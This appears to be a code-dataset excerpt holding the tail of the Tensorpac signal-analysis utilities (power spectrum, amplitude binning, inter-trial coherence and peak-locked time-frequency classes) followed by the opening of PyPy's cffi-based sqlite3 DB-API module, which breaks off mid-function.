@property\n def psd(self):\n \"\"\"Get the psd value.\"\"\"\n return self._psd\n\n\nclass BinAmplitude(_PacObj):\n \"\"\"Bin the amplitude according to the phase.\n\n Parameters\n ----------\n x : array_like\n Array of data of shape (n_epochs, n_times)\n sf : float\n The sampling frequency\n f_pha : tuple, list | [2, 4]\n List of two floats describing the frequency bounds for extracting the\n phase\n f_amp : tuple, list | [60, 80]\n List of two floats describing the frequency bounds for extracting the\n amplitude\n n_bins : int | 18\n Number of bins to use to binarize the phase and the amplitude\n dcomplex : {'wavelet', 'hilbert'}\n Method for the complex definition. 
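As a rough, standalone illustration of what the PSD class above computes before plotting, assuming synthetic data and the same periodogram/percentile calls (shapes and values here are illustrative only):

    import numpy as np
    from scipy.signal import periodogram

    sf = 256.
    x = np.random.randn(10, 1024)                  # (n_epochs, n_times)
    freqs, psd = periodogram(x, fs=sf, axis=1)     # psd: (n_epochs, n_freqs)

    confidence = 95
    interval = (100. - confidence) / 2
    psd_min = np.percentile(psd, interval, axis=0)
    psd_max = np.percentile(psd, 100. - interval, axis=0)
    mean_psd = psd.mean(0)                         # the curve PSD.plot draws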
Use either 'hilbert' or\n 'wavelet'.\n cycle : tuple | (3, 6)\n Control the number of cycles for filtering (only if dcomplex is\n 'hilbert'). Should be a tuple of integers where the first one\n refers to the number of cycles for the phase and the second for the\n amplitude :cite:`bahramisharif2013propagating`.\n width : int | 7\n Width of the Morlet's wavelet.\n edges : int | None\n Number of samples to discard to avoid edge effects due to filtering\n \"\"\"\n\n def __init__(self, x, sf, f_pha=[2, 4], f_amp=[60, 80], n_bins=18,\n dcomplex='hilbert', cycle=(3, 6), width=7, edges=None,\n n_jobs=-1):\n \"\"\"Init.\"\"\"\n _PacObj.__init__(self, f_pha=f_pha, f_amp=f_amp, dcomplex=dcomplex,\n cycle=cycle, width=width)\n # check\n x = np.atleast_2d(x)\n assert x.ndim <= 2, (\"`x` input should be an array of shape \"\n \"(n_epochs, n_times)\")\n assert isinstance(sf, (int, float)), (\"`sf` input should be a integer \"\n \"or a float\")\n assert all([isinstance(k, (int, float)) for k in f_pha]), (\n \"`f_pha` input should be a list of two integers / floats\")\n assert all([isinstance(k, (int, float)) for k in f_amp]), (\n \"`f_amp` input should be a list of two integers / floats\")\n assert isinstance(n_bins, int), \"`n_bins` should be an integer\"\n logger.info(f\"Binning {f_amp}Hz amplitude according to {f_pha}Hz \"\n \"phase\")\n # extract phase and amplitude\n kw = dict(keepfilt=False, edges=edges, n_jobs=n_jobs)\n pha = self.filter(sf, x, 'phase', **kw)\n amp = self.filter(sf, x, 'amplitude', **kw)\n # binarize amplitude according to phase\n self._amplitude = _kl_hr(pha, amp, n_bins, mean_bins=False).squeeze()\n self.n_bins = n_bins\n\n def plot(self, unit='rad', normalize=False, **kw):\n \"\"\"Plot the amplitude.\n\n Parameters\n ----------\n unit : {'rad', 'deg'}\n The unit to use for the phase. 
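A numpy-only sketch of the phase-binning step that BinAmplitude delegates to _kl_hr, using scipy.signal.hilbert on synthetic signals (all names and values here are illustrative, not the class's actual internals):

    import numpy as np
    from scipy.signal import hilbert

    rng = np.random.default_rng(0)
    slow = np.sin(2 * np.pi * 3 * np.linspace(0, 10, 5000))   # phase carrier
    fast = rng.standard_normal(5000)                           # amplitude carrier

    pha = np.angle(hilbert(slow))
    amp = np.abs(hilbert(fast))

    n_bins = 18
    edges = np.linspace(-np.pi, np.pi, n_bins + 1)
    idx = np.clip(np.digitize(pha, edges) - 1, 0, n_bins - 1)
    binned_amp = np.array([amp[idx == k].mean() for k in range(n_bins)])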
Use either 'deg' for degree or 'rad'\n for radians\n normalize : bool | None\n Normalize the histogram by the maximum\n kw : dict | {}\n Additional inputs are passed to the matplotlib.pyplot.bar function\n\n Returns\n -------\n ax : Matplotlib axis\n The matplotlib axis that contains the figure\n \"\"\"\n import matplotlib.pyplot as plt\n assert unit in ['rad', 'deg']\n if unit == 'rad':\n self._phase = np.linspace(-np.pi, np.pi, self.n_bins)\n width = 2 * np.pi / self.n_bins\n elif unit == 'deg':\n self._phase = np.linspace(-180, 180, self.n_bins)\n width = 360 / self.n_bins\n amp_mean = self._amplitude.mean(1)\n if normalize:\n amp_mean /= amp_mean.max()\n plt.bar(self._phase, amp_mean, width=width, **kw)\n plt.xlabel(f\"Frequency phase ({self.n_bins} bins)\", fontsize=18)\n plt.ylabel(\"Amplitude\", fontsize=18)\n plt.title(\"Binned amplitude\")\n plt.autoscale(enable=True, axis='x', tight=True)\n\n def show(self):\n \"\"\"Show the figure.\"\"\"\n import matplotlib.pyplot as plt\n plt.show()\n\n @property\n def amplitude(self):\n \"\"\"Get the amplitude value.\"\"\"\n return self._amplitude\n\n @property\n def phase(self):\n \"\"\"Get the phase value.\"\"\"\n return self._phase\n\n\nclass ITC(_PacObj, _PacVisual):\n \"\"\"Compute the Inter-Trials Coherence (ITC).\n\n The Inter-Trials Coherence (ITC) is a measure of phase consistency over\n trials for a single recording site (electrode / sensor etc.).\n\n Parameters\n ----------\n x : array_like\n Array of data of shape (n_epochs, n_times)\n sf : float\n The sampling frequency\n f_pha : tuple, list | [2, 4]\n List of two floats describing the frequency bounds for extracting the\n phase\n dcomplex : {'wavelet', 'hilbert'}\n Method for the complex definition. Use either 'hilbert' or\n 'wavelet'.\n cycle : tuple | 3\n Control the number of cycles for filtering the phase (only if dcomplex\n is 'hilbert').\n width : int | 7\n Width of the Morlet's wavelet.\n edges : int | None\n Number of samples to discard to avoid edge effects due to filtering\n \"\"\"\n\n def __init__(self, x, sf, f_pha=[2, 4], dcomplex='hilbert', cycle=3,\n width=7, edges=None, n_jobs=-1, verbose=None):\n \"\"\"Init.\"\"\"\n set_log_level(verbose)\n _PacObj.__init__(self, f_pha=f_pha, f_amp=[60, 80], dcomplex=dcomplex,\n cycle=(cycle, 6), width=width)\n _PacVisual.__init__(self)\n # check\n x = np.atleast_2d(x)\n assert x.ndim <= 2, (\"`x` input should be an array of shape \"\n \"(n_epochs, n_times)\")\n self._n_trials = x.shape[0]\n logger.info(\"Inter-Trials Coherence (ITC)\")\n logger.info(f\" extracting {len(self.xvec)} phases\")\n # extract phase and amplitude\n kw = dict(keepfilt=False, edges=edges, n_jobs=n_jobs)\n pha = self.filter(sf, x, 'phase', **kw)\n # compute itc\n self._itc = np.abs(np.exp(1j * pha).mean(1)).squeeze()\n self._sf = sf\n\n def plot(self, times=None, **kw):\n \"\"\"Plot the Inter-Trials Coherence.\n\n Parameters\n ----------\n times : array_like | None\n Custom time vector to use\n kw : dict | {}\n Additional inputs are either pass to the matplotlib.pyplot.plot\n function if a single phase band is used, otherwise to the\n matplotlib.pyplot.pcolormesh function\n\n Returns\n -------\n ax : Matplotlib axis\n The matplotlib axis that contains the figure\n \"\"\"\n import matplotlib.pyplot as plt\n n_pts = self._itc.shape[-1]\n if not isinstance(times, np.ndarray):\n times = np.arange(n_pts) / self._sf\n times = times[self._edges]\n assert len(times) == n_pts, (\"The length of the time vector should be \"\n \"{n_pts}\")\n xlab = 'Time'\n title = 
f\"Inter-Trials Coherence ({self._n_trials} trials)\"\n if self._itc.ndim == 1:\n plt.plot(times, self._itc, **kw)\n elif self._itc.ndim == 2:\n vmin = kw.get('vmin', np.percentile(self._itc, 1))\n vmax = kw.get('vmax', np.percentile(self._itc, 99))\n self.pacplot(self._itc, times, self.xvec, vmin=vmin, vmax=vmax,\n ylabel=\"Frequency for phase (Hz)\", xlabel=xlab,\n title=title, **kw)\n return plt.gca()\n\n def show(self):\n \"\"\"Show the figure.\"\"\"\n import matplotlib.pyplot as plt\n plt.show()\n\n @property\n def itc(self):\n \"\"\"Get the itc value.\"\"\"\n return self._itc\n\n\nclass PeakLockedTF(_PacObj, _PacVisual):\n \"\"\"Peak-Locked Time-frequency representation.\n\n This class can be used in order to re-align time-frequency representations\n around a time-point (cue) according to the closest phase peak. This type\n of visualization can bring out a cyclic behavior of the amplitude at a\n given phase, potentially indicating the presence of a phase-amplitude\n coupling. Here's the detailed pipeline :\n\n * Filter around a single phase frequency bands and across multiple\n amplitude frequencies\n * Use a `cue` which define the time-point to use for the realignment\n * Detect in the filtered phase the closest peak to the cue. This step\n is repeated to each trial in order to get a list of length (n_epochs)\n that contains the number of sample (shift) so that if the phase is\n moved, the peak fall onto the cue. A positive shift indicates that\n the phase is moved forward while a negative shift is for a backward\n move\n * Apply, to each trial, this shift to the amplitude\n * Plot the mean re-aligned amplitudes\n\n Parameters\n ----------\n x : array_like\n Array of data of shape (n_epochs, n_times)\n sf : float\n The sampling frequency\n cue : int, float\n Time-point to use in order to detect the closest phase peak. This\n parameter works in conjunction with the `times` input below. Use\n either :\n\n * An integer and `times` is None to indicate that you want to\n realign according to a time-point in sample\n * A integer or a float with `times` the time vector if you want\n that Tensorpac automatically infer the sample number around which\n to align\n times : array_like | None\n Time vector\n f_pha : tuple, list | [2, 4]\n List of two floats describing the frequency bounds for extracting the\n phase\n f_amp : tuple, list | [60, 80]\n Frequency vector for the amplitude. Here you can use several forms to\n define those vectors :\n\n * Dynamic definition : (start, stop, width, step)\n * Using a string : `f_amp` can be 'lres', 'mres', 'hres'\n respectively for low, middle and high resolution vectors\n cycle : tuple | (3, 6)\n Control the number of cycles for filtering. 
Should be a tuple of\n integers where the first one refers to the number of cycles for the\n phase and the second for the amplitude\n :cite:`bahramisharif2013propagating`.\n \"\"\"\n\n def __init__(self, x, sf, cue, times=None, f_pha=[5, 7], f_amp='hres',\n cycle=(3, 6), n_jobs=-1, verbose=None):\n \"\"\"Init.\"\"\"\n set_log_level(verbose)\n # initialize to retrieve filtering methods\n _PacObj.__init__(self, f_pha=f_pha, f_amp=f_amp, dcomplex='hilbert',\n cycle=cycle)\n _PacVisual.__init__(self)\n logger.info(\"PeakLockedTF object defined\")\n # inputs checking\n x = np.atleast_2d(x)\n assert isinstance(x, np.ndarray) and (x.ndim == 2)\n assert isinstance(sf, (int, float))\n assert isinstance(cue, (int, float))\n assert isinstance(f_pha, (list, tuple)) and (len(f_pha) == 2)\n n_epochs, n_times = x.shape\n\n # manage cur conversion\n if times is None:\n cue = int(cue)\n times = np.arange(n_times)\n logger.info(f\" align on sample cue={cue}\")\n else:\n assert isinstance(times, np.ndarray) and (len(times) == n_times)\n cue_time = cue\n cue = np.abs(times - cue).argmin() - 1\n logger.info(f\" align on time-point={cue_time} (sample={cue})\")\n self.cue, self._times = cue, times\n\n # extract phase and amplitudes\n logger.info(f\" extract phase and amplitudes \"\n f\"(n_amps={len(self.yvec)})\")\n kw = dict(keepfilt=False, n_jobs=n_jobs)\n pha = self.filter(sf, x, 'phase', n_jobs=n_jobs, keepfilt=True)\n amp = self.filter(sf, x, 'amplitude', n_jobs=n_jobs)\n self._pha, self._amp = pha, amp ** 2\n\n # peak detection\n logger.info(f\" running peak detection around sample={cue}\")\n self.shifts = self._peak_detection(self._pha.squeeze(), cue)\n\n # realign phases and amplitudes\n logger.info(f\" realign the {n_epochs} phases and amplitudes\")\n self.amp_a = self._shift_signals(self._amp, self.shifts, fill_with=0.)\n self.pha_a = self._shift_signals(self._pha, self.shifts, fill_with=0.)\n\n @staticmethod\n def _peak_detection(pha, cue):\n \"\"\"Single trial closest to a cue peak detection.\n\n Parameters\n ----------\n pha : array_like\n Array of single trial phases of shape (n_trials, n_times)\n cue : int\n Cue to use as a reference (in sample unit)\n\n Returns\n -------\n peaks : array_like\n Array of length (n_trials,) describing each delay to apply\n to each trial in order to realign the phases. 
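A standalone sketch of the closest-peak search described here, on a synthetic single-trial phase trace (the trace, cue value and names are illustrative):

    import numpy as np

    st_pha = np.cos(np.linspace(0, 8 * np.pi, 1000))   # stand-in for a filtered phase
    cue = 500

    peaks = [t for t in range(1, len(st_pha) - 1)
             if st_pha[t - 1] < st_pha[t] > st_pha[t + 1]]
    closest = peaks[np.abs(np.array(peaks) - cue).argmin()]
    shift = cue - closest   # positive: prepend zeros; negative: append zeros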
In detail :\n\n * Positive delays means that zeros should be prepend\n * Negative delays means that zeros should be append\n \"\"\"\n n_trials, n_times = pha.shape\n peaks = []\n for tr in range(n_trials):\n # select the single trial phase\n st_pha = pha[tr, :]\n # detect all peaks across time points\n st_peaks = []\n for t in range(n_times - 1):\n if (st_pha[t - 1] < st_pha[t]) and (st_pha[t] > st_pha[t + 1]):\n st_peaks += [t]\n # detect the minimum peak\n min_peak = st_peaks[np.abs(np.array(st_peaks) - cue).argmin()]\n peaks += [cue - min_peak]\n\n return np.array(peaks)\n\n @staticmethod\n def _shift_signals(sig, n_shifts, fill_with=0):\n \"\"\"Shift an array of signals according to an array of delays.\n\n Parameters\n ----------\n sig : array_like\n Array of signals of shape (n_freq, n_trials, n_times)\n n_shifts : array_like\n Array of delays to apply to each trial of shape (n_trials,)\n fill_with : int\n Value to prepend / append to each shifted time-series\n\n Returns\n -------\n sig_shifted : array_like\n Array of shifted signals with the same shape as the input\n \"\"\"\n # prepare the needed variables\n n_freqs, n_trials, n_pts = sig.shape\n sig_shifted = np.zeros_like(sig)\n # shift each trial\n for tr in range(n_trials):\n # select the data of a specific trial\n st_shift = n_shifts[tr]\n st_sig = sig[:, tr, :]\n fill = np.full((n_freqs, abs(st_shift)), fill_with,\n dtype=st_sig.dtype)\n # shift this specific trial\n if st_shift > 0: # move forward = prepend zeros\n sig_shifted[:, tr, :] = np.c_[fill, st_sig][:, 0:-st_shift]\n elif st_shift < 0: # move backward = append zeros\n sig_shifted[:, tr, :] = np.c_[st_sig, fill][:, abs(st_shift):]\n\n return sig_shifted\n\n def plot(self, zscore=False, baseline=None, edges=0, **kwargs):\n \"\"\"Integrated Peak-Locked TF plotting function.\n\n Parameters\n ----------\n zscore : bool | False\n Normalize the power by using a z-score normalization. This can be\n useful in order to compensate the 1 / f effect in the power\n spectrum. If True, the mean and deviation are computed at the\n single trial level and across all time points\n baseline : tuple | None\n Baseline period to use in order to apply the z-score correction.\n Should be in samples.\n edges : int | 0\n Number of pixels to discard to compensate filtering edge effect\n (`power[edges:-edges]`).\n kwargs : dict | {}\n Additional arguments are sent to the\n :class:`tensorpac.utils.PeakLockedTF.pacplot` method\n \"\"\"\n # manage additional arguments\n kwargs['colorbar'] = False\n kwargs['ylabel'] = 'Frequency for amplitude (hz)'\n kwargs['xlabel'] = ''\n kwargs['fz_labels'] = kwargs.get('fz_labels', 14)\n kwargs['fz_cblabel'] = kwargs.get('fz_cblabel', 14)\n kwargs['fz_title'] = kwargs.get('fz_title', 16)\n sl_times = slice(edges, len(self._times) - edges)\n times = self._times[sl_times]\n pha_n = self.pha_a[..., sl_times].squeeze()\n # z-score normalization\n if zscore:\n if baseline is None:\n bsl_idx = sl_times\n else:\n assert len(baseline) == 2\n bsl_idx = slice(baseline[0], baseline[1])\n _mean = self.amp_a[..., bsl_idx].mean(2, keepdims=True)\n _std = self.amp_a[..., bsl_idx].std(2, keepdims=True)\n _std[_std == 0.] = 1. 
# correction from NaN\n amp_n = (self.amp_a[..., sl_times] - _mean) / _std\n else:\n amp_n = self.amp_a[..., sl_times]\n\n # grid definition\n gs = GridSpec(8, 8)\n # image plot\n plt.subplot(gs[slice(0, 6), 0:-1])\n self.pacplot(amp_n.mean(1), times, self.yvec, **kwargs)\n plt.axvline(times[self.cue], color='w', lw=2)\n plt.tick_params(bottom=False, labelbottom=False)\n ax_1 = plt.gca()\n # external colorbar\n plt.subplot(gs[slice(1, 5), -1])\n cb = plt.colorbar(self._plt_im, pad=0.01, cax=plt.gca())\n cb.set_label('Power (V**2/Hz)', fontsize=kwargs['fz_cblabel'])\n cb.outline.set_visible(False)\n # phase plot\n plt.subplot(gs[slice(6, 8), 0:-1])\n plt.plot(times, pha_n.T, color='lightgray', alpha=.2, lw=1.)\n plt.plot(times, pha_n.mean(0), label='single trial phases', alpha=.2,\n lw=1.) # legend tweaking\n plt.plot(times, pha_n.mean(0), label='mean phases',\n color='#1f77b4')\n plt.axvline(times[self.cue], color='k', lw=2)\n plt.autoscale(axis='both', tight=True, enable=True)\n plt.xlabel(\"Times\", fontsize=kwargs['fz_labels'])\n plt.ylabel(\"V / Hz\", fontsize=kwargs['fz_labels'])\n # bottom legend\n plt.legend(loc='center', bbox_to_anchor=(.5, -.5),\n fontsize='x-large', ncol=2)\n ax_2 = plt.gca()\n\n return [ax_1, ax_2]\n"} {"ext": "py", "sha": "1a3088ec59399e2626ed70fead5607cac892a29c", "content": "#-*- coding: utf-8 -*-\n# pysqlite2/dbapi.py: pysqlite DB-API module\n#\n# Copyright (C) 2007-2008 Gerhard Häring \n#\n# This file is part of pysqlite.\n#\n# This software is provided 'as-is', without any express or implied\n# warranty. In no event will the authors be held liable for any damages\n# arising from the use of this software.\n#\n# Permission is granted to anyone to use this software for any purpose,\n# including commercial applications, and to alter it and redistribute it\n# freely, subject to the following restrictions:\n#\n# 1. The origin of this software must not be misrepresented; you must not\n# claim that you wrote the original software. If you use this software\n# in a product, an acknowledgment in the product documentation would be\n# appreciated but is not required.\n# 2. Altered source versions must be plainly marked as such, and must not be\n# misrepresented as being the original software.\n# 3. 
This notice may not be removed or altered from any source distribution.\n#\n# Note: This software has been modified for use in PyPy.\n\nfrom collections import OrderedDict\nfrom functools import wraps\nimport datetime\nimport string\nimport sys\nimport weakref\nfrom threading import _get_ident as _thread_get_ident\ntry:\n from __pypy__ import newlist_hint\nexcept ImportError:\n assert '__pypy__' not in sys.builtin_module_names\n newlist_hint = lambda sizehint: []\n\nif sys.version_info[0] >= 3:\n StandardError = Exception\n cmp = lambda x, y: (x > y) - (x < y)\n long = int\n xrange = range\n basestring = unicode = str\n buffer = memoryview\n _BLOB_TYPE = bytes\nelse:\n _BLOB_TYPE = buffer\n\nfrom _sqlite3_cffi import ffi as _ffi, lib as _lib\n\nexported_sqlite_symbols = [\n 'SQLITE_ALTER_TABLE',\n 'SQLITE_ANALYZE',\n 'SQLITE_ATTACH',\n 'SQLITE_CREATE_INDEX',\n 'SQLITE_CREATE_TABLE',\n 'SQLITE_CREATE_TEMP_INDEX',\n 'SQLITE_CREATE_TEMP_TABLE',\n 'SQLITE_CREATE_TEMP_TRIGGER',\n 'SQLITE_CREATE_TEMP_VIEW',\n 'SQLITE_CREATE_TRIGGER',\n 'SQLITE_CREATE_VIEW',\n 'SQLITE_DELETE',\n 'SQLITE_DENY',\n 'SQLITE_DETACH',\n 'SQLITE_DROP_INDEX',\n 'SQLITE_DROP_TABLE',\n 'SQLITE_DROP_TEMP_INDEX',\n 'SQLITE_DROP_TEMP_TABLE',\n 'SQLITE_DROP_TEMP_TRIGGER',\n 'SQLITE_DROP_TEMP_VIEW',\n 'SQLITE_DROP_TRIGGER',\n 'SQLITE_DROP_VIEW',\n 'SQLITE_IGNORE',\n 'SQLITE_INSERT',\n 'SQLITE_OK',\n 'SQLITE_PRAGMA',\n 'SQLITE_READ',\n 'SQLITE_REINDEX',\n 'SQLITE_SELECT',\n 'SQLITE_TRANSACTION',\n 'SQLITE_UPDATE',\n]\n\nfor symbol in exported_sqlite_symbols:\n globals()[symbol] = getattr(_lib, symbol)\n\n_SQLITE_TRANSIENT = _lib.SQLITE_TRANSIENT\n\n# pysqlite version information\nversion = \"2.6.0\"\n\n# pysqlite constants\nPARSE_COLNAMES = 1\nPARSE_DECLTYPES = 2\n\n# SQLite version information\nsqlite_version = str(_ffi.string(_lib.sqlite3_libversion()).decode('ascii'))\n\n_STMT_TYPE_UPDATE = 0\n_STMT_TYPE_DELETE = 1\n_STMT_TYPE_INSERT = 2\n_STMT_TYPE_REPLACE = 3\n_STMT_TYPE_OTHER = 4\n_STMT_TYPE_SELECT = 5\n_STMT_TYPE_INVALID = 6\n\n\nclass Error(StandardError):\n pass\n\n\nclass Warning(StandardError):\n pass\n\n\nclass InterfaceError(Error):\n pass\n\n\nclass DatabaseError(Error):\n pass\n\n\nclass InternalError(DatabaseError):\n pass\n\n\nclass OperationalError(DatabaseError):\n pass\n\n\nclass ProgrammingError(DatabaseError):\n pass\n\n\nclass IntegrityError(DatabaseError):\n pass\n\n\nclass DataError(DatabaseError):\n pass\n\n\nclass NotSupportedError(DatabaseError):\n pass\n\n\ndef connect(database, timeout=5.0, detect_types=0, isolation_level=\"\",\n check_same_thread=True, factory=None, cached_statements=100):\n factory = Connection if not factory else factory\n return factory(database, timeout, detect_types, isolation_level,\n check_same_thread, factory, cached_statements)\n\n\ndef _unicode_text_factory(x):\n return unicode(x, 'utf-8')\n\nif sys.version_info[0] < 3:\n def OptimizedUnicode(s):\n try:\n val = unicode(s, \"ascii\").encode(\"ascii\")\n except UnicodeDecodeError:\n val = unicode(s, \"utf-8\")\n return val\nelse:\n OptimizedUnicode = _unicode_text_factory\n\n\nclass _StatementCache(object):\n def __init__(self, connection, maxcount):\n self.connection = connection\n self.maxcount = maxcount\n self.cache = OrderedDict()\n\n def get(self, sql):\n try:\n stat = self.cache[sql]\n except KeyError:\n stat = Statement(self.connection, sql)\n self.cache[sql] = stat\n if len(self.cache) > self.maxcount:\n self.cache.popitem(0)\n else:\n if stat._in_use:\n stat = Statement(self.connection, sql)\n self.cache[sql] = 
stat\n return stat\n\n\nclass Connection(object):\n __initialized = False\n _db = None\n\n def __init__(self, database, timeout=5.0, detect_types=0, isolation_level=\"\",\n check_same_thread=True, factory=None, cached_statements=100):\n self.__initialized = True\n db_star = _ffi.new('sqlite3 **')\n\n if isinstance(database, unicode):\n database = database.encode('utf-8')\n if _lib.sqlite3_open(database, db_star) != _lib.SQLITE_OK:\n raise OperationalError(\"Could not open database\")\n self._db = db_star[0]\n if timeout is not None:\n timeout = int(timeout * 1000) # pysqlite2 uses timeout in seconds\n _lib.sqlite3_busy_timeout(self._db, timeout)\n\n self.row_factory = None\n self.text_factory = _unicode_text_factory\n\n self._detect_types = detect_types\n self._in_transaction = False\n self.isolation_level = isolation_level\n\n self.__cursors = []\n self.__cursors_counter = 0\n self.__statements = []\n self.__statements_counter = 0\n self.__rawstatements = set()\n self._statement_cache = _StatementCache(self, cached_statements)\n\n self.__func_cache = {}\n self.__aggregates = {}\n self.__aggregate_instances = {}\n self.__collations = {}\n if check_same_thread:\n self.__thread_ident = _thread_get_ident()\n\n self.Error = Error\n self.Warning = Warning\n self.InterfaceError = InterfaceError\n self.DatabaseError = DatabaseError\n self.InternalError = InternalError\n self.OperationalError = OperationalError\n self.ProgrammingError = ProgrammingError\n self.IntegrityError = IntegrityError\n self.DataError = DataError\n self.NotSupportedError = NotSupportedError\n\n def __del__(self):\n if self._db:\n _lib.sqlite3_close(self._db)\n\n def close(self):\n self._check_thread()\n\n self.__do_all_statements(Statement._finalize, True)\n\n # depending on when this close() is called, the statements' weakrefs\n # may be already dead, even though Statement.__del__() was not called\n # yet. In this case, self.__rawstatements is not empty.\n if self.__rawstatements is not None:\n for stmt in list(self.__rawstatements):\n self._finalize_raw_statement(stmt)\n self.__rawstatements = None\n\n if self._db:\n ret = _lib.sqlite3_close(self._db)\n if ret != _lib.SQLITE_OK:\n raise self._get_exception(ret)\n self._db = None\n\n def _check_closed(self):\n if not self.__initialized:\n raise ProgrammingError(\"Base Connection.__init__ not called.\")\n if not self._db:\n raise ProgrammingError(\"Cannot operate on a closed database.\")\n\n def _check_closed_wrap(func):\n @wraps(func)\n def wrapper(self, *args, **kwargs):\n self._check_closed()\n return func(self, *args, **kwargs)\n return wrapper\n\n def _check_thread(self):\n try:\n if self.__thread_ident == _thread_get_ident():\n return\n except AttributeError:\n pass\n else:\n raise ProgrammingError(\n \"SQLite objects created in a thread can only be used in that \"\n \"same thread. 
The object was created in thread id %d and this \"\n \"is thread id %d\" % (self.__thread_ident, _thread_get_ident()))\n\n def _check_thread_wrap(func):\n @wraps(func)\n def wrapper(self, *args, **kwargs):\n self._check_thread()\n return func(self, *args, **kwargs)\n return wrapper\n\n def _get_exception(self, error_code=None):\n if error_code is None:\n error_code = _lib.sqlite3_errcode(self._db)\n error_message = _ffi.string(_lib.sqlite3_errmsg(self._db)).decode('utf-8')\n\n if error_code == _lib.SQLITE_OK:\n raise ValueError(\"error signalled but got SQLITE_OK\")\n elif error_code in (_lib.SQLITE_INTERNAL, _lib.SQLITE_NOTFOUND):\n exc = InternalError\n elif error_code == _lib.SQLITE_NOMEM:\n exc = MemoryError\n elif error_code in (\n _lib.SQLITE_ERROR, _lib.SQLITE_PERM, _lib.SQLITE_ABORT,\n _lib.SQLITE_BUSY, _lib.SQLITE_LOCKED, _lib.SQLITE_READONLY,\n _lib.SQLITE_INTERRUPT, _lib.SQLITE_IOERR, _lib.SQLITE_FULL,\n _lib.SQLITE_CANTOPEN, _lib.SQLITE_PROTOCOL, _lib.SQLITE_EMPTY,\n _lib.SQLITE_SCHEMA):\n exc = OperationalError\n elif error_code == _lib.SQLITE_CORRUPT:\n exc = DatabaseError\n elif error_code == _lib.SQLITE_TOOBIG:\n exc = DataError\n elif error_code in (_lib.SQLITE_CONSTRAINT, _lib.SQLITE_MISMATCH):\n exc = IntegrityError\n elif error_code == _lib.SQLITE_MISUSE:\n exc = ProgrammingError\n else:\n exc = DatabaseError\n exc = exc(error_message)\n exc.error_code = error_code\n return exc\n\n def _remember_cursor(self, cursor):\n self.__cursors.append(weakref.ref(cursor))\n self.__cursors_counter += 1\n if self.__cursors_counter < 200:\n return\n self.__cursors_counter = 0\n self.__cursors = [r for r in self.__cursors if r() is not None]\n\n def _remember_statement(self, statement):\n self.__rawstatements.add(statement._statement)\n self.__statements.append(weakref.ref(statement))\n self.__statements_counter += 1\n if self.__statements_counter < 200:\n return\n self.__statements_counter = 0\n self.__statements = [r for r in self.__statements if r() is not None]\n\n def _finalize_raw_statement(self, _statement):\n if self.__rawstatements is not None:\n try:\n self.__rawstatements.remove(_statement)\n except KeyError:\n return # rare case: already finalized, see issue #2097\n _lib.sqlite3_finalize(_statement)\n\n def __do_all_statements(self, action, reset_cursors):\n for weakref in self.__statements:\n statement = weakref()\n if statement is not None:\n action(statement)\n\n if reset_cursors:\n for weakref in self.__cursors:\n cursor = weakref()\n if cursor is not None:\n cursor._reset = True\n\n @_check_thread_wrap\n @_check_closed_wrap\n def __call__(self, sql):\n return self._statement_cache.get(sql)\n\n def cursor(self, factory=None):\n self._check_thread()\n self._check_closed()\n if factory is None:\n factory = Cursor\n cur = factory(self)\n if self.row_factory is not None:\n cur.row_factory = self.row_factory\n return cur\n\n def execute(self, *args):\n cur = self.cursor()\n return cur.execute(*args)\n\n def executemany(self, *args):\n cur = self.cursor()\n return cur.executemany(*args)\n\n def executescript(self, *args):\n cur = self.cursor()\n return cur.executescript(*args)\n\n def iterdump(self):\n from sqlite3.dump import _iterdump\n return _iterdump(self)\n\n def _begin(self):\n statement_star = _ffi.new('sqlite3_stmt **')\n ret = _lib.sqlite3_prepare_v2(self._db, self.__begin_statement, -1,\n statement_star, _ffi.NULL)\n try:\n if ret != _lib.SQLITE_OK:\n raise self._get_exception(ret)\n ret = _lib.sqlite3_step(statement_star[0])\n if ret != _lib.SQLITE_DONE:\n raise 
self._get_exception(ret)\n self._in_transaction = True\n finally:\n _lib.sqlite3_finalize(statement_star[0])\n\n def commit(self):\n self._check_thread()\n self._check_closed()\n if not self._in_transaction:\n return\n\n self.__do_all_statements(Statement._reset, False)\n\n statement_star = _ffi.new('sqlite3_stmt **')\n ret = _lib.sqlite3_prepare_v2(self._db, b\"COMMIT\", -1,\n statement_star, _ffi.NULL)\n try:\n if ret != _lib.SQLITE_OK:\n raise self._get_exception(ret)\n ret = _lib.sqlite3_step(statement_star[0])\n if ret != _lib.SQLITE_DONE:\n raise self._get_exception(ret)\n self._in_transaction = False\n finally:\n _lib.sqlite3_finalize(statement_star[0])\n\n def rollback(self):\n self._check_thread()\n self._check_closed()\n if not self._in_transaction:\n return\n\n self.__do_all_statements(Statement._reset, True)\n\n statement_star = _ffi.new('sqlite3_stmt **')\n ret = _lib.sqlite3_prepare_v2(self._db, b\"ROLLBACK\", -1,\n statement_star, _ffi.NULL)\n try:\n if ret != _lib.SQLITE_OK:\n raise self._get_exception(ret)\n ret = _lib.sqlite3_step(statement_star[0])\n if ret != _lib.SQLITE_DONE:\n raise self._get_exception(ret)\n self._in_transaction = False\n finally:\n _lib.sqlite3_finalize(statement_star[0])\n\n def __enter__(self):\n return self\n\n def __exit__(self, exc_type, exc_value, exc_tb):\n if exc_type is None and exc_value is None and exc_tb is None:\n self.commit()\n else:\n self.rollback()\n\n @_check_thread_wrap\n @_check_closed_wrap\n def create_function(self, name, num_args, callback):\n try:\n closure = self.__func_cache[callback]\n except KeyError:\n @_ffi.callback(\"void(sqlite3_context*, int, sqlite3_value**)\")\n def closure(context, nargs, c_params):\n _function_callback(callback, context, nargs, c_params)\n self.__func_cache[callback] = closure\n\n if isinstance(name, unicode):\n name = name.encode('utf-8')\n ret = _lib.sqlite3_create_function(self._db, name, num_args,\n _lib.SQLITE_UTF8, _ffi.NULL,\n closure, _ffi.NULL, _ffi.NULL)\n if ret != _lib.SQLITE_OK:\n raise self.OperationalError(\"Error creating function\")\n\n @_check_thread_wrap\n @_check_closed_wrap\n def create_aggregate(self, name, num_args, cls):\n try:\n step_callback, final_callback = self.__aggregates[cls]\n except KeyError:\n @_ffi.callback(\"void(sqlite3_context*, int, sqlite3_value**)\")\n def step_callback(context, argc, c_params):\n res = _lib.sqlite3_aggregate_context(context,\n _ffi.sizeof(\"size_t\"))\n aggregate_ptr = _ffi.cast(\"size_t[1]\", res)\n\n if not aggregate_ptr[0]:\n try:\n aggregate = cls()\n except Exception:\n msg = (b\"user-defined aggregate's '__init__' \"\n b\"method raised error\")\n _lib.sqlite3_result_error(context, msg, len(msg))\n return\n aggregate_id = id(aggregate)\n self.__aggregate_instances[aggregate_id] = aggregate\n aggregate_ptr[0] = aggregate_id\n else:\n aggregate = self.__aggregate_instances[aggregate_ptr[0]]\n\n 